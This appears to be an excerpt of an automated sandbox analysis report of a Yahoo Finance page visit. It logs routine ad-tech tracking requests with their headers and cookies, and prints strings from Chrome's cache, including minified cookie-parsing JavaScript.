__gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /w/1.0/sd?id=537072991&val=CAESEBekM66nmsCe4_HEDSbE50c&google_cver=1 HTTP/1.1Host: us-u.openx.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: i=5a760414-e99e-05e0-04c1-b14876f22eba|1727716879; pd=v2|1727716881|vMgavPkWgyiK; univ_id=537072971|07c89b85-4c1c-424d-8df0-0123ed6cebb6|1727716886210126
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/HeatMap.v9WG23fw.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /mw?zpartnerid=1384&env=mWeb&gdpr=0&gdpr_consent=&cid=176682A8-E121-44A7-818D-4FE53D542BB2 HTTP/1.1Host: mwzeom.zeotap.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zc=cb7eebb1-bafc-4730-564f-caf0c86528d8
Source: global trafficHTTP traffic detected: GET /pubmatic/1/info?sType=sync&sExtCookieId=176682A8-E121-44A7-818D-4FE53D542BB2&sInitiator=external&gdpr=0&gdpr_consent= HTTP/1.1Host: uipus.semasio.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: SEUNCY=8B22F39EC31AE5F8
Source: global trafficHTTP traffic detected: GET /pixel?google_nid=openx&google_hm=YTViNWU4ODctODk2ZS02NGIzLTRiZjctMjMxOWQ4MzdkMzI3 HTTP/1.1Host: cm.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkUkNwMMgJ6QEXcNmBLe89FRWkxDD1qfpDAQyrRUH_QfzDefzbvv9fnUjUM9uM
Source: global trafficHTTP traffic detected: GET /dcm?pid=6e1b1225-4dd8-4d7d-b277-465574a27014&id=d10c4730-5cb3-81ed-9e19-fb377ae6d6a7&dcc=t HTTP/1.1Host: s.amazon-adsystem.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-privacy=0; ad-id=A3cS_gqdeUbvqw-b1fKqWAc
Source: global trafficHTTP traffic detected: GET /AdServer/PugMaster?sec=1&async=1&kdntuid=1&rnd=54374054&p=133799&s=0&a=0&ptask=ALL&np=0&fp=0&rp=1&mpc=0&spug=1&coppa=0&gdpr=0&gdpr_consent=&us_privacy=1YNN HTTP/1.1Host: image6.pubmatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ads.pubmatic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: KADUSERCOOKIE=176682A8-E121-44A7-818D-4FE53D542BB2; chkChromeAb67Sec=2; DPSync4=1728864000%3A227_226_219_197_245_241; SyncRTB4=1728259200%3A223%7C1728864000%3A220_201_13_251_54_71_3_21_56_266; ipc=160648^https%3A%2F%2Fimage4.pubmatic.com%2FAdServer%2FSPug%3Fp%3D160648%26pmc%3DPM_PMC%26pr%3Dhttps%253A%252F%252Fsync-pm.ads.yieldmo.com%252Fsync%253Fpn_id%253Dpub%2526id%253D%2523PMUID%2526gdpr%253DPM_GDPR%2526gdpr_consent%253DPM_CONSENT^2^0; pi=160648:3; KRTBCOOKIE_57=22776-7992184014990425658&KRTB&23339-7992184014990425658; KRTBCOOKIE_80=22987-CAESEH85Z0C6pHtyE6-DEC6SiYM&KRTB&16514-CAESEH85Z0C6pHtyE6-DEC6SiYM&KRTB&23025-CAESEH85Z0C6pHtyE6-DEC6SiYM&KRTB&23386-CAESEH85Z0C6pHtyE6-DEC6SiYM; PugT=1727716886
Source: global trafficHTTP traffic detected: GET /xuid?mid=2319&xuid=0-44ef61b2-fe37-563b-497a-08aac775d996$ip$8.46.123.33&dongle=4430 HTTP/1.1Host: eb2.3lift.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: tluid=3811239664715375770435; tluidp=3811239664715375770435
Source: global trafficHTTP traffic detected: GET /ebda?gdpr=0&gdpr_consent= HTTP/1.1Host: eb2.3lift.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: tluid=3811239664715375770435; tluidp=3811239664715375770435
Source: global trafficHTTP traffic detected: GET /AdServer/SPug?partnerID=133799&gdpr=0&gdpr_consent=&us_privacy=1YNN HTTP/1.1Host: simage4.pubmatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ads.pubmatic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: KADUSERCOOKIE=176682A8-E121-44A7-818D-4FE53D542BB2; chkChromeAb67Sec=2; DPSync4=1728864000%3A227_226_219_197_245_241; SyncRTB4=1728259200%3A223%7C1728864000%3A220_201_13_251_54_71_3_21_56_266; ipc=160648^https%3A%2F%2Fimage4.pubmatic.com%2FAdServer%2FSPug%3Fp%3D160648%26pmc%3DPM_PMC%26pr%3Dhttps%253A%252F%252Fsync-pm.ads.yieldmo.com%252Fsync%253Fpn_id%253Dpub%2526id%253D%2523PMUID%2526gdpr%253DPM_GDPR%2526gdpr_consent%253DPM_CONSENT^2^0; pi=160648:3; KRTBCOOKIE_57=22776-7992184014990425658&KRTB&23339-7992184014990425658; KRTBCOOKIE_80=22987-CAESEH85Z0C6pHtyE6-DEC6SiYM&KRTB&16514-CAESEH85Z0C6pHtyE6-DEC6SiYM&KRTB&23025-CAESEH85Z0C6pHtyE6-DEC6SiYM&KRTB&23386-CAESEH85Z0C6pHtyE6-DEC6SiYM; PugT=1727716886
Source: global trafficHTTP traffic detected: GET /v000/sync?tdid=07c89b85-4c1c-424d-8df0-0123ed6cebb6 HTTP/1.1Host: ads.yieldmo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yieldmo_id=VRLAoLL__uL1ewyIa5Iq%7C1727654400000%7C0; re_sync=rc%3D1200643%7Cunl%3D1200643%7Ct%3D1200643%7Cpub%3D1200643%7Can%3D1200643; ptran=7992184014990425658; ptrt=07c89b85-4c1c-424d-8df0-0123ed6cebb6; ptrrc=M1PA0VVQ-I-EWH1
Source: global trafficHTTP traffic detected: GET /sync?pn_id=rc&id=M1PA0VVQ-I-EWH1 HTTP/1.1Host: ads.yieldmo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yieldmo_id=VRLAoLL__uL1ewyIa5Iq%7C1727654400000%7C0; re_sync=rc%3D1200643%7Cunl%3D1200643%7Ct%3D1200643%7Cpub%3D1200643%7Can%3D1200643; ptran=7992184014990425658; ptrt=07c89b85-4c1c-424d-8df0-0123ed6cebb6; ptrrc=M1PA0VVQ-I-EWH1
Source: global trafficHTTP traffic detected: GET /s/dcm?pid=a38a8ddf-19a7-4ab8-ba05-0a61de92a7e5&id=&gdpr=0&us_privacy=1YNN HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eus.rubiconproject.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-privacy=0; ad-id=A3cS_gqdeUbvqw-b1fKqWAc
Source: global trafficHTTP traffic detected: GET /v000/sync?pn_id=unl&id=RX-3fef85e6-bbf0-409a-a376-6c1ad497756a-003 HTTP/1.1Host: ads.yieldmo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.yieldmo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yieldmo_id=VRLAoLL__uL1ewyIa5Iq%7C1727654400000%7C0; re_sync=rc%3D1200643%7Cunl%3D1200643%7Ct%3D1200643%7Cpub%3D1200643%7Can%3D1200643; ptran=7992184014990425658; ptrt=07c89b85-4c1c-424d-8df0-0123ed6cebb6; ptrrc=M1PA0VVQ-I-EWH1
Source: global trafficHTTP traffic detected: GET /setuid?bidder=adobe&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=-1&f=i&uid=ZvreFAAGJeTfkQAF&_test=ZvreFAAGJeTfkQAF HTTP/1.1Host: pbs.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; uids=eyJ0ZW1wVUlEcyI6eyJpeCI6eyJ1aWQiOiJadnJlRU5ITTZJNEFBQXlxQURvMmt3QUFBX0lBQUFJQiIsImV4cGlyZXMiOiIyMDI0LTEwLTE0VDE3OjIxOjIyLjQxMDIyNTg2NFoifSwidHRkIjp7InVpZCI6IjA3Yzg5Yjg1LTRjMWMtNDI0ZC04ZGYwLTAxMjNlZDZjZWJiNiIsImV4cGlyZXMiOiIyMDI0LTEwLTE0VDE3OjIxOjI2Ljg4OTIwNTA0M1oifX19
Source: global trafficHTTP traffic detected: GET /setuid?bidder=ttd&uid=07c89b85-4c1c-424d-8df0-0123ed6cebb6&gdpr=0&gdpr_consent= HTTP/1.1Host: pbs.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; uids=eyJ0ZW1wVUlEcyI6eyJpeCI6eyJ1aWQiOiJadnJlRU5ITTZJNEFBQXlxQURvMmt3QUFBX0lBQUFJQiIsImV4cGlyZXMiOiIyMDI0LTEwLTE0VDE3OjIxOjIyLjQxMDIyNTg2NFoifSwidHRkIjp7InVpZCI6IjA3Yzg5Yjg1LTRjMWMtNDI0ZC04ZGYwLTAxMjNlZDZjZWJiNiIsImV4cGlyZXMiOiIyMDI0LTEwLTE0VDE3OjIxOjI2Ljg4OTIwNTA0M1oifX19
Source: global trafficHTTP traffic detected: GET /cv/apiv2/default/20181213/Finance_Brand_Filler__300x250_Look_1.jpg HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pixel?google_nid=triplelift&gdpr=0&gdpr_consent=&us_privacy=&google_hm=MzgxMTIzOTY2NDcxNTM3NTc3MDQzNQ%3D%3D HTTP/1.1Host: cm.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkUkNwMMgJ6QEXcNmBLe89FRWkxDD1qfpDAQyrRUH_QfzDefzbvv9fnUjUM9uM
Source: global trafficHTTP traffic detected: GET /w/1.0/cm?_={CACHEBUSTER}&id=47f31213-389c-4904-aaa6-9b11aab9c211&gdpr=0&gdpr_consent=&us_privacy=1YNN&r=https%3A%2F%2Fusersync.gumgum.com%2Fusersync%3Fb%3Dopx%26i%3D HTTP/1.1Host: us-u.openx.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rtb.gumgum.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; i=5a760414-e99e-05e0-04c1-b14876f22eba|1727716879; pd=v2|1727716881|vMgavPkWgyiK; univ_id=537072971|07c89b85-4c1c-424d-8df0-0123ed6cebb6|1727716886210126
Source: global trafficHTTP traffic detected: GET /sync?nid=1&gdpr=0&gdpr_consent= HTTP/1.1Host: sync.srv.stackadapt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rtb.gumgum.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sa-user-id=s%3A0-44ef61b2-fe37-563b-497a-08aac775d996.HUZAD87nGmfB6ts9monpnGc74iU%2BnIDtZVp3vzenSYI; sa-user-id=s%3A0-44ef61b2-fe37-563b-497a-08aac775d996.HUZAD87nGmfB6ts9monpnGc74iU%2BnIDtZVp3vzenSYI; sa-user-id-v2=s%3ARO9hsv43VjtJegiqx3XZlggueyE.f1DEnV0kSRDqXApJa8DQm75QGQfLI69IqPby0eTbqqo; sa-user-id-v2=s%3ARO9hsv43VjtJegiqx3XZlggueyE.f1DEnV0kSRDqXApJa8DQm75QGQfLI69IqPby0eTbqqo; sa-user-id-v3=s%3AAQAKIPMD_qM83gEw_KpANQ1k_u5OM7M1EA1HSai3RTqI7aomEHwYBCCVvOu3BjABOgT87-jmQgR-pEY0.vN32%2Fd4YZ9DOY3AsHv3gov3556bSU87K4Y1v5IEQfZQ; sa-user-id-v3=s%3AAQAKIPMD_qM83gEw_KpANQ1k_u5OM7M1EA1HSai3RTqI7aomEHwYBCCVvOu3BjABOgT87-jmQgR-pEY0.vN32%2Fd4YZ9DOY3AsHv3gov3556bSU87K4Y1v5IEQfZQ
Source: global trafficHTTP traffic detected: GET /track/cmf/rubicon?gdpr=0&us_privacy=1YNN HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eus.rubiconproject.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: TDID=07c89b85-4c1c-424d-8df0-0123ed6cebb6; TDCPM=CAESFgoHc3Z4OXQ1MBILCOb3lfnK37A9EAUSFwoIcHVibWF0aWMSCwiykPGYy9-wPRAFGAEgASgCMgsI3Ib0xeHfsD0QBTgBWghwdWJtYXRpY2AC
Source: global trafficHTTP traffic detected: GET /cv/apiv2/default/20181213/Finance_Brand_Filler__970x250_Look_1.jpg HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ecm3?ex=rubiconprojectHMT&id=OWxibrJZSL2W6ksTJ3Av2g&gdpr=0 HTTP/1.1Host: s.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eus.rubiconproject.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-privacy=0; ad-id=A3cS_gqdeUbvqw-b1fKqWAc
Source: global trafficHTTP traffic detected: GET /usersync/gumgum/?puid=e_5a867c78-d90d-4df8-b8ff-e041d0dc2e22&gdpr=0&gdpr_consent=&us_privacy=1YNN&cb=https%3A%2F%2Fusersync.gumgum.com%2Fusersync%3Fb%3Dzem%26i%3D__ZUID__ HTTP/1.1Host: b1sync.zemanta.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rtb.gumgum.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: chromecache_1186.2.drString found in binary or memory: "id": "com.yahoo.www.twa", equals www.yahoo.com (Yahoo)
Source: chromecache_1186.2.drString found in binary or memory: "android_package_name": "com.yahoo.www.twa", equals www.yahoo.com (Yahoo)
Source: chromecache_757.2.drString found in binary or memory: */t.parse=function(e,t){if("string"!=typeof e)throw new TypeError("argument str must be a string");for(var o={},i=t||{},a=e.split(r),c=i.decode||n,l=0;l<a.length;l++){var d=a[l],p=d.indexOf("=");if(!(p<0)){var u=d.substr(0,p).trim(),m=d.substr(++p,d.length).trim();'"'==m[0]&&(m=m.slice(1,-1)),null==o[u]&&(o[u]=s(m,c))}}return o},t.serialize=function(e,t,n){var r=n||{},s=r.encode||o;if(!i.test(e))throw new TypeError("argument name is invalid");var a=s(t);if(a&&!i.test(a))throw new TypeError("argument val is invalid");var c=e+"="+a;if(null!=r.maxAge){var l=r.maxAge-0;if(isNaN(l))throw new Error("maxAge should be a Number");c+="; Max-Age="+Math.floor(l)}if(r.domain){if(!i.test(r.domain))throw new TypeError("option domain is invalid");c+="; Domain="+r.domain}if(r.path){if(!i.test(r.path))throw new TypeError("option path is invalid");c+="; Path="+r.path}r.expires&&(c+="; Expires="+r.expires.toUTCString());r.httpOnly&&(c+="; HttpOnly");r.secure&&(c+="; Secure");r.firstPartyOnly&&(c+="; First-Party-Only");return c};var n=decodeURIComponent,o=encodeURIComponent,r=/; */,i=/^[\u0009\u0020-\u007e\u0080-\u00ff]+$/;function s(e,t){try{return t(e)}catch(t){return e}}}},t={};function n(o){var r=t[o];if(void 0!==r)return r.exports;var i=t[o]={exports:{}};return e[o](i,i.exports,n),i.exports}n.n=e=>{var t=e&&e.__esModule?()=>e.default:()=>e;return n.d(t,{a:t}),t},n.d=(e,t)=>{for(var o in t)n.o(t,o)&&!n.o(e,o)&&Object.defineProperty(e,o,{enumerable:!0,get:t[o]})},n.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window)return window}}(),n.o=(e,t)=>Object.prototype.hasOwnProperty.call(e,t),(()=>{"use strict";var e=n(586);const t=["aol.com","aol.co.uk","aol.de","autoblog.com","cricket.yahoo.sportz.io","engadget.com","primetime.bluejeans.com","techcrunch.com","yahoo.com","yahoo.com.hk","yahoo.com.tw"].map((e=>`([\\.\\w\\-]+\\.)?${e.replace(/\./g,"\\.")}`)),o=["cricket.yahoo.net","www.tumblr.com"].map((e=>e.replace(/\./g,"\\."))),r=new RegExp(`^https?://(${t.concat(o).join("|")})(:\\d+)?$`),i=/^https:\/\/[a-z]+\.surveymonkey\.com\/r\/(\w+)(?:\?([^#]+))?(?:#(\w+))?$/,s=/^https:\/\/yahooresearch\.qualtrics\.com\/jfe\/form\/(\w+)(?:\?([^#]+))?(?:#(\w+))?$/,a="Q_Language",c=/\w+/,l=/^[\w-]+$/,d={CLOSE:{en:"Close",es:"Cerrar",fr:"Fermer",de:"Schlie equals www.yahoo.com 